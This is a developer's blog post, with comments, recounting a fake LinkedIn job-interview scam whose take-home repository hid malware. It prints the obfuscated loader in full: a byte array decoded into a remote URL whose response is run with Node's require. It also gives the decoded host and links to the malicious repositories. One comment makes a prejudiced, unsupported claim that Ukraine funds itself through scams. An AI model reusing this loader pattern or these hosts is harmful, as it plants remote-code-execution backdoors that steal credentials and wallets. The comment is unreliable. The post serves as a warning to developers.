How I Almost Got Hacked By A 'Job Interview'

UpdatedNovember 19, 2025

•5 min read

How I Almost Got Hacked By A 'Job Interview'

Hey there!

I'm an electronics engineer who's dabbled in a bit of everything, including full-stack development and web3 technologies. I love building cool stuff and am always looking to connect with other like-minded professionals. When I'm not tinkering with new projects, you can find me scouring the internet for the latest and greatest in tech.

I was 30 seconds away from running malware on my machine.

The attack vector? A fake coding interview from a "legitimate" blockchain company.

Here's how a sophisticated scam operation almost got me, and why every developer needs to read this.

The Setup

Last week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works.

The message was smooth. Professional. "We're developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure."

I've been freelancing for 8 years. Built web applications, worked on various projects, done my share of code reviews. I'm usually paranoid about security - or so I thought.

This looked legit. So I said yes to the call.

The Hook

Before our meeting, Mykola sent me a "test project" - standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough.

The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one.

Here's where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do - I started poking around the codebase without running it first.

Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush.

I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work.

Then I had one of those paranoid developer moments.

The Save

Before hitting npm start, I threw this prompt at my Cursor AI agent:

"Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc."

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty:

//Get Cookie  
(async () => {  
    const byteArray = [  
        104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
        110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
        98, 50, 48, 51, 49, 102, 98, 57  
    ];  
    const uint8Array = new Uint8Array(byteArray);  
    const decoder = new TextDecoder('utf-8');  
    axios.get(decoder.decode(uint8Array))  
        .then(response => {  
            new Function("require", response.data.model)(require);  
        })  
        .catch(error => { });  
})();

Obfuscated. Sneaky. Evil. And 100% active - embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything - crypto wallets, files, passwords, your entire digital existence.

Here's the kicker: the URL died exactly 24 hours later. These guys weren't messing around - they had their infrastructure set up to burn evidence fast.

I ran the payload through VirusTotal - check out the behavior analysis yourself. Spoiler alert: it's nasty.

The Operation

This wasn't some amateur hour scam. This was sophisticated:

The LinkedIn Profile: Mykola Yanchii looked 100% real. Chief Blockchain Officer. Proper work history. Even had those cringy LinkedIn posts about "innovation" and "blockchain consulting."

The Company: Symfa had a full LinkedIn company page. Professional branding. Multiple employees. Posts about "transforming real estate with blockchain." They even had affiliated pages and follower networks.

The Approach: No red flags in the initial outreach. Professional language. Reasonable project scope. They even used Calendly for scheduling.

The Payload: The malicious code was positioned strategically in the server-side controller, ready to execute with full Node.js privileges when admin functionality was accessed.

The Psychology

Here's what made this so dangerous:

Urgency: "Complete the test before the meeting to save time."

Authority: LinkedIn verified profile, real company, professional setup.

Familiarity: Standard take-home coding test. Every developer has done dozens of these.

Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I'm paranoid about this stuff.

The Lesson

One simple AI prompt saved me from disaster.

Not fancy security tools. Not expensive antivirus software. Just asking my coding assistant to look for suspicious patterns before executing unknown code.

The scary part? This attack vector is perfect for developers. We download and run code all day long. GitHub repos, npm packages, coding challenges. Most of us don't sandbox every single thing.

And this was server-side malware. Full Node.js privileges. Access to environment variables, database connections, file systems, crypto wallets. Everything.

The Scale

If this sophisticated operation is targeting developers at scale, how many have already been compromised? How many production systems are they inside right now?

Perfect Targeting: Developers are ideal victims. Our machines contain the keys to the kingdom: production credentials, crypto wallets, client data.

Professional Camouflage: LinkedIn legitimacy, realistic codebases, standard interview processes.

Technical Sophistication: Multi-layer obfuscation, remote payload delivery, dead-man switches, server-side execution.

One successful infection could compromise production systems at major companies, crypto holdings worth millions, personal data of thousands of users.

The Bottom Line

If you're a developer getting LinkedIn job opportunities:

Always sandbox unknown code. Docker containers, VMs, whatever. Never run it on your main machine.
Use AI to scan for suspicious patterns. Takes 30 seconds. Could save your entire digital life.
Verify everything. Real LinkedIn profile doesn't mean real person. Real company doesn't mean real opportunity.
Trust your gut. If someone's rushing you to execute code, that's a red flag.

This scam was so sophisticated it fooled my initial BS detector. But one paranoid moment and a simple AI prompt exposed the whole thing.

The next time someone sends you a "coding challenge," remember this story.

Your crypto wallet will thank you.

If you're a developer who has run "coding challenges" from LinkedIn recruiters, you should probably read this twice.

the LinkedIn profiles

Messages

bit bucket

https://bitbucket.org/0x3bestcity/test_version/src/main/ - not sure how long this will stay up though.

#developer #scamalert #scam

Comments (11)

Join the discussion

bryan Karasugashima5mo ago

I mean the logo of "BE BRAVE LIKE UKRAINE" and f*cking ---->MYKOLA<--- Yanchii should ring all the alarm bells you needed, its well known and documented in news articles how Ukranda is running all kinds of massive scam operation to fund their futile war and bankrupt government. Dont believe me? just do a search on google or yandex to get both sides of the coin. Adi would heavily question even the "Founder" and "recruiter" in the comments.

Mark Thomas5mo ago

That is scary.

Interesting that you used AI to save yourself. I would have had 2nd thoughts at the AI generated estate agent!

Also: who has production credentials on their developer machine?? Then you are asking for it.

Stay safe out there.

chelmix5mo ago

Hi David, thank you for sharing your story, it made me realize I was definitely not paranoid enough... so far 😅

Do you know if the malware involved was platform-agnostic? For instance, could being on Linux vs Windows save the potential victim?

zhao alex5mo ago

Hi David, thanks for sharing. I've ran the script, luckly the computer I ran the code did not hold any important information. I'll reinstall the OS. And thanks again for sharing the valuable experience.

Dmytro ChuChuk6mo ago

Hi David, thanks for your posting. Can you share me with that malware JS file? I'd like to see that honestly.

Billy Shin6mo ago

I got the same treatment from a different recruiter and different company! This time they MODIFIED a npm library to hit a URL (api.mocki[.]io/v2/chopmguh/tracks/errors/190529. Its safe as LONG as you don't run the downloaded javascript, it will appear as text) and run this obfuscated code!!!

The company is another Crypto company (www.linkedin.[.]com/company/blockchain-121/) from a recruiter (www.linkedin[.]com/in/elena-blahodir/) which I have already reported to linkedin.

They also sent me to a bitbucket repo. (bitbucket[.]org/screening_assessment/mike_dex_challenge_ret/src/main/) (Just realized this thing has 3 forks~~ And the watchers of each for are questionable. Anyway another lead to chase down. )

And all the emails... they come from .outlook.com. That should been a big clue.

I unfortunately ran the code locally (facepalm), and I am trying to track down if anything malicious is happening on my machine.

I have another recruiter hitting me up from a very odd company which is following the same pattern, and I am suspecting is another one of these.

Anna Maksimovich6mo ago

Hi David 👋

I'm a Lead Recruiter here at Symfa.

Thanks so much for sharing your story 🙌.

Sadly, these kinds of scams, where people pretend to be from legitimate companies, are happening more and more. We've reported these fake profiles pretending to be our employees multiple times, but LinkedIn hasn't done anything to block them.

Here are a few things to keep in mind:

Symfa and our teams had nothing to do with what happened.
Our job postings and interviews only go through official channels.
We never give out assignments to complete before a technical interview!

To help protect yourself from these schemes:

Always double-check the email address – Symfa emails always end in @symfa.com.
Watch out for how the interview is structured: our recruiters and tech folks always turn on their cameras and explain the hiring process step-by-step.
If anything seems fishy, reach out to Symfa directly at talent@symfa.com or through our website.

We're doing our best to catch and stop these scammers as fast as possible.

I would appreciate it if you could provide me with more detailed information. Could you also let me know how I can find you on LinkedIn?

Sergey Galuza6mo ago

Hi David, I'm Sergey Galuza – Symfa's founder. Thanks for flagging this! These scammers have nothing to do with Symfa – they just exploited LinkedIn's default setting that lets anyone add any company to their profile. We've now disabled that and added verification. If you have any additional info, I'd be happy if you share in DM so we can investigate this further. Appreciate you looking out for the dev community!

Nick Elovsky6mo ago

I used to work at Symfa. Yes, it wasn't the best experience, but even for them, scamming is beyond what I can imagine and believe. What I think happened to you is that a corrupt employee was involved. I can't find that Mykola on LinkedIn right now (as of 2025.10.16). I suppose he either worked there and was fired after the incident, or he never existed: just a fake account connected to the company. In any case, they covered the whole thing up. Obviously, they need to check who they’re connected to in their profile. It just means we need to be suspicious of people. Since the Mitnick era, not much has changed.

George Kiknadze6mo ago

It seems like they were quite prepared. I'd say the screenshots, especially the LinkedIn profile and messages look pretty convincing. Usually, scammers are sloppy, they don't use Calendly, and you can often spot things like odd punctuation in their comments. But these guys seem professional.

One red flag for me is that I never do coding challenges before having at least one face-to-face video call. That filters out a lot of scammers.

More from this blog

Made to Imitate?

for (i = 0; i < numberOfElements; i++) { doSomethingWith(element[i]); } This works, but isn't very elegant. The Ruby way is much more elegant. elements.each do |element| do_something_with(ele

Apr 2, 20262 min read

Using Claude Code as Your Lab Partner: A Framework for Running Experiments

I needed to benchmark my laptop for local AI workloads — how fast can it transcribe audio? What LLMs can it run? Rather than spend a weekend hacking at it manually, I paired with Claude Code and treat

Mar 13, 202610 min read

Using Claude Code as Your Lab Partner: A Framework for Running Experiments

Laughing in the Face of Fear: How I Accidentally Rewired My Brain Through Movies

"Why do you keep smiling?" My friend's puzzled voice cut through the theater's surround sound as yet another jump scare filled the screen. I hadn't even realized I was doing it. There I was, grinning like an idiot while a demon wreaked havoc on scree...

Sep 17, 20254 min read

Laughing in the Face of Fear: How I Accidentally Rewired My Brain Through Movies

Most AI Code is Garbage. Here's How Mine Isn't.

I Spent $450 in 3 Weeks Building 100k Lines of Code (And Didn't Want to Burn It Down) Note: All the exact prompts and templates I used are included at the bottom of this article, plus a link to get even more prompts. Most developers spend months buil...

Jul 22, 202515 min read

Most AI Code is Garbage. Here's How Mine Isn't.

David Dodda

17 posts

Hi, I'm David, a tech enthusiast who loves bringing creative ideas to life. I write about frontend, backend, ai, homelab setup, and electronics. follow me on twitter for updates on my latest projects

Command Palette